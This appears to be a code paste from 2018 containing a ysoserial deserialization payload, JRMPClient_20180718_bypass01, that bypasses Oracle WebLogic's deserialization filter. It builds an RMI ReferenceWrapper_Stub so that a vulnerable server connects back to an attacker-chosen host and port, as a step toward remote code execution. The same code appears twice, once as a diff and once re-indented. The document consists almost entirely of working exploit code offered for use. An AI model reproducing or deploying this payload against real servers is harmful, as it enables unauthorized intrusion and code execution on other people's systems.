allyshka · October 25, 2018 15:26
diff --git a/JRMPClient_20180718_bypass01.java b/JRMPClient_20180718_bypass01.java
 // All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
 // URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
 package ysoserial.payloads;

 import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
 import sun.rmi.server.UnicastRef;
 import sun.rmi.transport.LiveRef;
 import sun.rmi.transport.tcp.TCPEndpoint;
 import ysoserial.payloads.annotation.Authors;
 import ysoserial.payloads.annotation.PayloadTest;
 import ysoserial.payloads.util.PayloadRunner;

 import java.lang.reflect.Proxy;
 import java.rmi.registry.Registry;
 import java.rmi.server.ObjID;
 import java.rmi.server.RemoteObjectInvocationHandler;
 import java.util.Random;


 @SuppressWarnings ( {
    "restriction"
 } )
 @PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
 @Authors({ Authors.MBECHLER })
 public class JRMPClient_20180718_bypass01 extends PayloadRunner implements
 ObjectPayload<ReferenceWrapper_Stub> {
    public ReferenceWrapper_Stub getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt());
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref);
        return stud;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader());
        PayloadRunner.run(JRMPClient_20180718_bypass01.class, args);
    }
 }
	// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
	// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
	package ysoserial.payloads;

	import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
	import sun.rmi.server.UnicastRef;
	import sun.rmi.transport.LiveRef;
	import sun.rmi.transport.tcp.TCPEndpoint;
	import ysoserial.payloads.annotation.Authors;
	import ysoserial.payloads.annotation.PayloadTest;
	import ysoserial.payloads.util.PayloadRunner;

	import java.lang.reflect.Proxy;
	import java.rmi.registry.Registry;
	import java.rmi.server.ObjID;
	import java.rmi.server.RemoteObjectInvocationHandler;
	import java.util.Random;


	@SuppressWarnings ( {
	"restriction"
	} )
	@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
	@Authors({ Authors.MBECHLER })
	public class JRMPClient_20180718_bypass01 extends PayloadRunner implements
	ObjectPayload<ReferenceWrapper_Stub> {
	public ReferenceWrapper_Stub getObject ( final String command ) throws Exception {

	String host;
	int port;
	int sep = command.indexOf(':');
	if ( sep < 0 ) {
	port = new Random().nextInt(65535);
	host = command;
	}
	else {
	host = command.substring(0, sep);
	port = Integer.valueOf(command.substring(sep + 1));
	}
	ObjID id = new ObjID(new Random().nextInt());
	TCPEndpoint te = new TCPEndpoint(host, port);
	UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
	ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref);
	return stud;
	}


	public static void main ( final String[] args ) throws Exception {
	Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader());
	PayloadRunner.run(JRMPClient_20180718_bypass01.class, args);
	}
	}